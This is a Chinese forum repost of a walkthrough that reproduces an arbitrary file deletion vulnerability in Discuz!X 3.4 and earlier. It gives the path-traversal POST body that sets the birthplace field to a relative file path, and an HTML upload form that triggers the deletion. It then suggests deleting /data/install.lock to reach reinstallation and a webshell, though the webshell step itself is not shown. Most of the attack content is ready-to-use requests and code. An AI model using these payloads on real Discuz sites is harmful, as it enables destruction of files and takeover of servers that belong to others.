神魂顛倒論壇

 取回密碼
 加入會員
搜尋
檢視: 36053|回覆: 0
收起左側

[安全] Discuz!X ≤3.4 任意文件删除漏洞复现+GetWebshell

[複製連結]
發表於 2021-8-9 17:47:01 | 顯示全部樓層 |閱讀模式
【漏洞分析】Discuz!X ≤3.4 任意文件删除漏洞分析
复现的话需要源码在网上还是找到了
那我们根据文章所知的几个步骤:
1.修改出生地为文件相对路径
发送POST请求:/home.php?mod=spacecp&ac=profile&op=base
POST正文为:birthprovince=../../../test.txt&profilesubmit=1&formhash=b644603b
formhash为用户自己的,所以这里在网页上找一个对应填写过来就OK:
djz0jp2up9.png


请求完成之后出生地会修改为../../../test.txt
zpbgy4yvud.png
2.上传文件
这里构造了一个上传表单:
<form action="http://192.168.0.10/dz3.4/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file"/>Formhash: <input type="text" name="formhash"/>
<input type="hidden" name="profilesubmit" value="1"/>
<input type="submit" value="Submit"/>
</from>
发送过去后发现成功删除了:
漏洞复现成功,那在这里呢我们思考一下能否进行扩大化危害的测试?于是想到了删除安装程序锁(/data/install.lock)
复现上文步骤删除它即可


原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。
原始发表时间:2017-12-21


您需要登入後才可以回帖 登入 | 加入會員

本版積分規則

Archiver|手機版|小黑屋|Flash2u論壇

GMT+8, 2024-11-24 05:32 , Processed in 0.084837 second(s), 23 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回覆 回到頂端 返回清單